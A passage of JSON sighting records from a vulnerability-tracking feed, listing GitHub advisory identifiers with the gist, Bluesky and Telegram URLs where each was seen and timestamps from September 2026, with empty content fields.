"type": "seen", "source": "https://gist.github.com/alon710/aeca88a9cadc2c33877b37b541208edc", "content": "", "creation_timestamp": "2026-09-03T21:05:03.395142Z"}, {"uuid": "fc3eab85-0643-4b4d-aff2-f35732039387", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p95v-992w-h6c3", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mund7yawdn25", "content": "", "creation_timestamp": "2026-09-03T20:50:06.666572Z"}, {"uuid": "027a7566-546e-44c3-9417-3b77c47c9d14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xvg9-69gf-fjrf", "type": "seen", "source": "https://gist.github.com/alon710/b48a4802ab7de78f3b7bc06aac45d10c", "content": "", "creation_timestamp": "2026-09-03T20:32:54.938282Z"}, {"uuid": "69c2a62f-4711-4217-8401-521e6856cc5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rgw5-rvv9-x895", "type": "seen", "source": "https://gist.github.com/konard/89a0a4cf1c31638c67d192f7a8f1aa7d", "content": "", "creation_timestamp": "2026-09-03T20:24:38.604110Z"}, {"uuid": "471a0569-295e-496e-bff9-cae2691ff2b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-52cp-r559-cp3m", "type": "seen", "source": "https://gist.github.com/konard/89a0a4cf1c31638c67d192f7a8f1aa7d", "content": "", "creation_timestamp": "2026-09-03T20:24:24.467363Z"}, {"uuid": "7186e1bc-de39-497a-9c4e-ec0a70eccfdd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-h67p-54hq-rp68", "type": "seen", "source": "https://gist.github.com/konard/89a0a4cf1c31638c67d192f7a8f1aa7d", "content": "", "creation_timestamp": "2026-09-03T20:24:10.842515Z"}, {"uuid": "b7c7e962-fb2e-4830-851c-e25d8fdba996", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5p4m-2wfm-xmqj", "type": "seen", "source": "https://gist.github.com/konard/89a0a4cf1c31638c67d192f7a8f1aa7d", "content": "", "creation_timestamp": "2026-09-03T20:23:57.526371Z"}, {"uuid": "3e19736a-e07c-4f6d-9dda-1cf38288d146", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f65p-4m7j-42xc", "type": "seen", "source": "https://gist.github.com/konard/dd2953c7e8aaafb583eb5ca63d192c70", "content": "", "creation_timestamp": "2026-09-03T20:01:16.152007Z"}, {"uuid": "6a2922e7-993c-4a73-87f2-ef4c083462c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jqff-g426-hqxp", "type": "seen", "source": "https://gist.github.com/konard/dd2953c7e8aaafb583eb5ca63d192c70", "content": "", "creation_timestamp": "2026-09-03T20:01:14.921973Z"}, {"uuid": "acd36dfa-de0e-4e1c-81c5-09477402808c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fph4-wmhf-6fwf", "type": "seen", "source": "https://gist.github.com/konard/dd2953c7e8aaafb583eb5ca63d192c70", "content": "", "creation_timestamp": "2026-09-03T20:01:13.788687Z"}, {"uuid": "fd1923f6-f903-4d6b-82d4-a40e296ceeb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6gmq-8vp8-gcm6", "type": "seen", "source": "https://gist.github.com/konard/dd2953c7e8aaafb583eb5ca63d192c70", "content": "", "creation_timestamp": "2026-09-03T20:01:12.724805Z"}, {"uuid": "d0d93ef7-ed00-417d-83e4-6cd34e7b5ea1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5jgf-p345-68v8", "type": "seen", "source": "https://gist.github.com/konard/dd2953c7e8aaafb583eb5ca63d192c70", "content": "", "creation_timestamp": "2026-09-03T20:01:11.584271Z"}, {"uuid": "8d44acc1-e0c9-4d6a-baff-2fc36f0d5ac4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f65p-4m7j-42xc", "type": "seen", "source": "https://gist.github.com/konard/414f6d2acf125677f96485ac80cd6a3e", "content": "", "creation_timestamp": "2026-09-03T19:52:00.796987Z"}, {"uuid": "6dc9b5cb-0576-4b44-88d3-78a30f09e6e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jqff-g426-hqxp", "type": "seen", "source": "https://gist.github.com/konard/414f6d2acf125677f96485ac80cd6a3e", "content": "", "creation_timestamp": "2026-09-03T19:52:00.066946Z"}, {"uuid": "28c01af6-4ddd-41f4-a1c1-ff51dcc57cb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fph4-wmhf-6fwf", "type": "seen", "source": "https://gist.github.com/konard/414f6d2acf125677f96485ac80cd6a3e", "content": "", "creation_timestamp": "2026-09-03T19:51:59.329150Z"}, {"uuid": "51762fcc-1e12-4326-a299-bef386b6373f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6gmq-8vp8-gcm6", "type": "seen", "source": "https://gist.github.com/konard/414f6d2acf125677f96485ac80cd6a3e", "content": "", "creation_timestamp": "2026-09-03T19:51:58.602351Z"}, {"uuid": "2627d0f4-ef01-4506-b9e9-a566929e1c4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5jgf-p345-68v8", "type": "seen", "source": "https://gist.github.com/konard/414f6d2acf125677f96485ac80cd6a3e", "content": "", "creation_timestamp": "2026-09-03T19:51:57.877367Z"}, {"uuid": "89a07257-7b06-4c8c-8471-7be309f21528", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2h9g-j24r-h63g", "type": "seen", "source": "https://gist.github.com/alon710/ca4d0cdb0c789284d2fa209ad1644bb6", "content": "", "creation_timestamp": "2026-09-03T19:32:48.325050Z"}, {"uuid": "8e4e199b-5feb-493e-a3f4-1f8a6938898f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rgw5-rvv9-x895", "type": "seen", "source": "https://gist.github.com/konard/05d19a59942ef51514e30abcc55dbc13", "content": "", "creation_timestamp": "2026-09-03T19:24:36.359129Z"}, {"uuid": "cbdee928-3873-4344-b7e1-c748ff89f06f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-52cp-r559-cp3m", "type": "seen", "source": "https://gist.github.com/konard/05d19a59942ef51514e30abcc55dbc13", "content": "", "creation_timestamp": "2026-09-03T19:24:25.303232Z"}, {"uuid": "dd1a2294-9a94-474d-9ced-ae3ce8641ab8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-h67p-54hq-rp68", "type": "seen", "source": "https://gist.github.com/konard/05d19a59942ef51514e30abcc55dbc13", "content": "", "creation_timestamp": "2026-09-03T19:24:14.398976Z"}, {"uuid": "b71923cc-e9b0-4f0c-b02d-74b14e37eeb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5p4m-2wfm-xmqj", "type": "seen", "source": "https://gist.github.com/konard/05d19a59942ef51514e30abcc55dbc13", "content": "", "creation_timestamp": "2026-09-03T19:24:03.031096Z"}, {"uuid": "ccf51794-b283-47e6-b48e-536178a24ff9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8q3c-rjr9-xxrp", "type": "seen", "source": "https://gist.github.com/alon710/c6744c105236e73d40303105f85b8498", "content": "", "creation_timestamp": "2026-09-03T18:33:18.214825Z"}, {"uuid": "ed777aeb-b4d3-4e68-8f26-ca5df2ccab31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-78x9-fhhx-v2g6", "type": "seen", "source": "https://gist.github.com/alon710/6e5cd16daf1e1da3bc33cf6d0ea63990", "content": "", "creation_timestamp": "2026-09-03T17:31:38.288855Z"}, {"uuid": "8950166b-b1ad-4c3a-abfe-88fbd12c2c97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-99RQ-75J6-5J9F", "type": "seen", "source": "https://gist.github.com/alon710/d65b5dca92403a85945f3e44ec0bab5b", "content": "", "creation_timestamp": "2026-09-03T16:32:49.975861Z"}, {"uuid": "304462be-e174-4042-a9a6-c96fa7cf4ca6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-99rq-75j6-5j9f", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mumuhan3ly2j", "content": "", "creation_timestamp": "2026-09-03T16:25:43.451770Z"}, {"uuid": "33baaab3-45ef-4236-ba18-d000c53ee0d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-99rq-75j6-5j9f", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mumuh7p2t22a", "content": "", "creation_timestamp": "2026-09-03T16:25:42.800596Z"}, {"uuid": "19ae82a1-d7fc-41a7-8fc9-4172339e7a69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6865-qjcf-286f", "type": "seen", "source": "https://gist.github.com/alon710/e3c7c4ac6e973c0fb6aac00603c26e83", "content": "", "creation_timestamp": "2026-09-03T15:32:02.673191Z"}, {"uuid": "4fb17073-6f94-46d6-873c-7965c6b3d150", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-GW25-M53R-QH88", "type": "seen", "source": "https://gist.github.com/alon710/e3c7c4ac6e973c0fb6aac00603c26e83", "content": "", "creation_timestamp": "2026-09-03T15:32:02.618507Z"}, {"uuid": "e36f2772-e6f9-4c24-940d-466d916990b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7mgc-c7pq-3rr3", "type": "seen", "source": "https://gist.github.com/alon710/fb22df514827698e37bf556e10bb1199", "content": "", "creation_timestamp": "2026-09-03T14:32:32.740941Z"}, {"uuid": "5c2c8d85-1a92-475d-9f87-3e7e315ee012", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mvxr-6m87-mv2q", "type": "seen", "source": "https://gist.github.com/alon710/29f68a70244d7a5251761f7cfc9eeaab", "content": "", "creation_timestamp": "2026-09-03T13:31:46.892933Z"}, {"uuid": "61fa5f6a-6d77-4c67-a113-a640f9a610d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7w2g-9mf9-324m", "type": "seen", "source": "https://gist.github.com/alon710/51de9c39add9ed5552c3d2ae7ebb5a97", "content": "", "creation_timestamp": "2026-09-03T12:32:57.559668Z"}, {"uuid": "c64d0684-f308-400f-bbff-358962bac201", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mh22-prqr-vf42", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/d3a9a3be-7e46-44d6-a018-982d32551a2a", "content": "", "creation_timestamp": "2026-09-03T12:28:54.061853Z"}, {"uuid": "265e7608-fa04-4bce-9582-29b58b13de06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x898-729x-cc3r", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/d3a9a3be-7e46-44d6-a018-982d32551a2a", "content": "", "creation_timestamp": "2026-09-03T12:28:54.061853Z"}, {"uuid": "c999d6dd-daac-49fb-be73-c4e4287d9d06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g29j-rwfv-h99w", "type": "seen", "source": "https://gist.github.com/alon710/ac9a336078ecd53e84e4088322a7f9af", "content": "", "creation_timestamp": "2026-09-03T11:31:46.936601Z"}, {"uuid": "3628a195-8f11-4c40-85b8-054c74d02efb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4q39-2jhr-7qx8", "type": "seen", "source": "https://gist.github.com/alon710/b49a4882cbb663c91159acdfe34ae468", "content": "", "creation_timestamp": "2026-09-03T10:32:33.945628Z"}, {"uuid": "8924bc6a-a9cc-40cd-98a9-b2dd8c30b205", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XFVV-GGVQ-PCHH", "type": "published-proof-of-concept", "source": "https://t.me/hacking_Attack/184244", "content": "", "creation_timestamp": "2026-09-03T00:00:36.803694Z"}, {"uuid": "78b0290b-5b1d-4cdf-89b1-0cf0c3f039ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4fwh-wrm6-97xm", "type": "seen", "source": "https://gist.github.com/alon710/5492ab7cd525f5c1f9f536468a2a6ab4", "content": "", "creation_timestamp": "2026-09-23T21:31:11.033379Z"}, {"uuid": "92bc68df-e1f9-4b3e-b8c2-f0d4666f16a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-97cv-x867-6xhm", "type": "seen", "source": "https://gist.github.com/alon710/5f3098f0ef594e678313ac3cea1fd61f", "content": "", "creation_timestamp": "2026-09-23T20:32:15.169756Z"}, {"uuid": "1e46e9af-d49c-4df7-a52e-f3cbc67e4662", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m8r3-22v6-g877", "type": "seen", "source": "https://gist.github.com/alon710/c6373b33ac6c019650400085845933ec", "content": "", "creation_timestamp": "2026-09-23T18:31:57.721853Z"}, {"uuid": "b99baf8c-5419-42a2-96e5-6ea851797338", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5f42-97gr-vfhq", "type": "seen", "source": "https://gist.github.com/alon710/08e10cd96ef3773d0fb4e2857a496796", "content": "", "creation_timestamp": "2026-09-23T17:31:57.926156Z"}, {"uuid": "3d37c585-aa06-484c-90fd-3ef9c6cd418e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5mmc-8pc9-wggg", "type": "seen", "source": "https://gist.github.com/alon710/39d3465701d68ededce1355dd7bcc16e", "content": "", "creation_timestamp": "2026-09-23T16:32:05.517053Z"}, {"uuid": "8e046920-313e-4586-9aca-da604bab9999", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gxrg-x694-283w", "type": "seen", "source": "https://gist.github.com/alon710/5d7065e19498fa7e5c333fadaf0458b2", "content": "", "creation_timestamp": "2026-09-23T15:34:03.204067Z"}, {"uuid": "100ed3a4-90d1-4971-9b2a-c608461d85d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WX4J-MVGX-MQWP", "type": "seen", "source": "https://t.me/GithubRedTeam/103144", "content": "", "creation_timestamp": "2026-09-23T15:06:05.000000Z"}, {"uuid": "663e61d5-76b8-4240-84d4-6bbedc5d278e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VCVR-R3JV-PC5J", "type": "seen", "source": "https://t.me/GithubRedTeam/103144", "content": "", "creation_timestamp": "2026-09-23T15:06:05.000000Z"}, {"uuid": "c4a2b4fe-4762-4bbd-bdc1-0e92380dcf2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j43x-5hjq-rgxf", "type": "seen", "source": "https://bsky.app/profile/standup.thecompound.tech/post/3mw6xng7fiv2r", "content": "", "creation_timestamp": "2026-09-23T14:35:58.839865Z"}, {"uuid": "110cbd72-eabc-4e4b-921b-6d0e792f604f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j43x-5hjq-rgxf", "type": "seen", "source": "https://gist.github.com/alon710/979d7d899727637e6e9c2c6d617956b2", "content": "", "creation_timestamp": "2026-09-23T14:32:29.338366Z"}, {"uuid": "1eb68228-11e0-4299-b515-3b6241fa7c4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-56v6-2fhr-wxgq", "type": "seen", "source": "https://gist.github.com/alon710/f4948b85008393550183db83af47c6eb", "content": "", "creation_timestamp": "2026-09-23T13:31:59.768262Z"}, {"uuid": "01936d7a-8054-45e8-a9a0-465886fd4b91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q4c5-2j6f-r476", "type": "seen", "source": "https://gist.github.com/alon710/e1072924de003b6765183a66872ae79e", "content": "", "creation_timestamp": "2026-09-23T12:31:40.689592Z"}, {"uuid": "256f4dab-20f8-4be2-b186-e3d379a26580", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7hp8-65ch-5whp", "type": "seen", "source": "https://bsky.app/profile/newsyc200.bsky.social/post/3mw6p4vdn6d2d", "content": "", "creation_timestamp": "2026-09-23T12:03:34.484394Z"}, {"uuid": "39cb923e-a7b7-4dd5-b03c-cbaed0334dcc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7HP8-65CH-5WHP", "type": "seen", "source": "https://t.me/GithubRedTeam/103129", "content": "", "creation_timestamp": "2026-09-23T12:00:07.000000Z"}, {"uuid": "99463035-2f54-490b-bd2b-c0608b1685f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hrmj-7rvj-4hg8", "type": "seen", "source": "https://gist.github.com/alon710/74e359aa08359ada7f9cbef0f754a03e", "content": "", "creation_timestamp": "2026-09-23T11:32:02.842035Z"}, {"uuid": "ff121304-9726-4868-be3e-72a2ddd6be88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VHM9-85GW-X335", "type": "seen", "source": "Telegram/dpkxto8hbiMIhO0P8GojYV49fEiH_kEDtpJR3Yq5J38Ekuw", "content": "", "creation_timestamp": "2026-09-23T10:56:09.000000Z"}, {"uuid": "fbb74524-e885-4db7-86c2-c6b0fb7c1d0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xpjq-3w4w-w5wr", "type": "seen", "source": "https://gist.github.com/alon710/bf969bdec8772c71ac789467bc649eb3", "content": "", "creation_timestamp": "2026-09-23T07:31:38.042285Z"}, {"uuid": "889eb14e-fe7c-463e-9c66-93ab484aee9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4825-p4xm-pcf2", "type": "seen", "source": "https://gist.github.com/alon710/0f041c2843a6a8b00e2f4484b53f3243", "content": "", "creation_timestamp": "2026-09-23T06:31:30.727026Z"}, {"uuid": "e291551f-776a-426b-9808-8f9c2e7cb3b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7HP8-65CH-5WHP", "type": "seen", "source": "https://t.me/GithubRedTeam/103110", "content": "", "creation_timestamp": "2026-09-23T06:00:14.000000Z"}, {"uuid": "5d9c4b12-d9e8-43ab-804d-d78286888e30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xj3h-wwxq-gfcj", "type": "seen", "source": "https://gist.github.com/alon710/0f4409fbe4cfa22658c44aa73c2a9873", "content": "", "creation_timestamp": "2026-09-23T05:32:15.226659Z"}, {"uuid": "67857b58-89e8-44b7-ad29-2180bd9785f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7hp8-65ch-5whp", "type": "seen", "source": "https://bsky.app/profile/preya.mastodon.social.ap.brid.gy/post/3mw5ykmhxocc2", "content": "", "creation_timestamp": "2026-09-23T05:20:29.338378Z"}, {"uuid": "b9db3357-79a5-44c9-a088-d4b762736ccf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w89x-c962-c44g", "type": "seen", "source": "https://gist.github.com/alon710/ef2507a456faec84524daa5ace994dc8", "content": "", "creation_timestamp": "2026-09-23T04:31:50.873773Z"}, {"uuid": "7e2878c5-9c3f-4756-b2a8-f2e763456704", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gfjv-gqf2-c888", "type": "seen", "source": "https://gist.github.com/alon710/26ba9dee42d0a3f388db8a758a47e2b4", "content": "", "creation_timestamp": "2026-09-23T03:32:16.941354Z"}, {"uuid": "869a8219-b852-4075-9b05-0f2dba4eff8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jvh5-97xg-v99f", "type": "seen", "source": "https://gist.github.com/alon710/57edfd5f29828b39c794e053b9ab7b82", "content": "", "creation_timestamp": "2026-09-23T02:32:16.590641Z"}, {"uuid": "317eeffb-d836-4614-b758-93eeb49ae324", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9q4h-f4x5-ffq8", "type": "seen", "source": "https://gist.github.com/alon710/e9f5751d53da9a852f30f01c259b5c25", "content": "", "creation_timestamp": "2026-09-23T01:31:28.123315Z"}, {"uuid": "97184d60-4847-4b92-b405-8e58a963d570", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-992g-9cr3-vm5x", "type": "seen", "source": "https://gist.github.com/alon710/7fc7905eeee7b3e580e11b9e78f8548b", "content": "", "creation_timestamp": "2026-09-23T00:32:28.171448Z"}, {"uuid": "9a314ec7-d47f-4476-863e-bfcc94426fd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-PH86-9MCX-3P6R", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/102996", "content": "", "creation_timestamp": "2026-09-23T00:00:09.910964Z"}, {"uuid": "b8362dcd-cf03-4b3f-afb3-f45f08c773bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xj3h-wwxq-gfcj", "type": "seen", "source": "https://bsky.app/profile/standup.thecompound.tech/post/3mw5g5k5cyb2z", "content": "", "creation_timestamp": "2026-09-22T23:50:12.742969Z"}, {"uuid": "dbdb4015-4e97-4549-b257-90fd2b9cb64a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8fcf-v89g-xpg6", "type": "seen", "source": "https://gist.github.com/alon710/af64fb0e4974981b0997528347311521", "content": "", "creation_timestamp": "2026-09-22T23:31:56.736883Z"}, {"uuid": "cbdd9327-a037-4c39-b1ba-8a32574be5d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4ghv-53cq-7wp3", "type": "seen", "source": "https://gist.github.com/alon710/514237596aac504f5f1548b022761aec", "content": "", "creation_timestamp": "2026-09-22T22:31:58.884143Z"}, {"uuid": "0b0b0f4d-f1aa-4aa7-936d-b9c3e6b614a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xjgw-4wvw-rgm4", "type": "seen", "source": "https://bsky.app/profile/euvd-bot.bsky.social/post/3mw5a4estk52e", "content": "", "creation_timestamp": "2026-09-22T22:02:10.946036Z"}, {"uuid": "7d7d0013-8a5c-4034-8a82-6b42449ac261", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wx4m-69m9-gx3m", "type": "seen", "source": "https://gist.github.com/alon710/4c2c1021543d93cf5f79daddff3b5a00", "content": "", "creation_timestamp": "2026-09-22T21:32:14.739740Z"}, {"uuid": "21f4f5a8-7ae0-4585-a65e-52e980c0f9da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-34fc-gh42-pj53", "type": "seen", "source": "https://bsky.app/profile/standup.thecompound.tech/post/3mw552agnxt2g", "content": "", "creation_timestamp": "2026-09-22T21:07:17.850571Z"}, {"uuid": "8cd33202-8d21-426b-9718-5f57ac5585fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-040", "type": "seen", 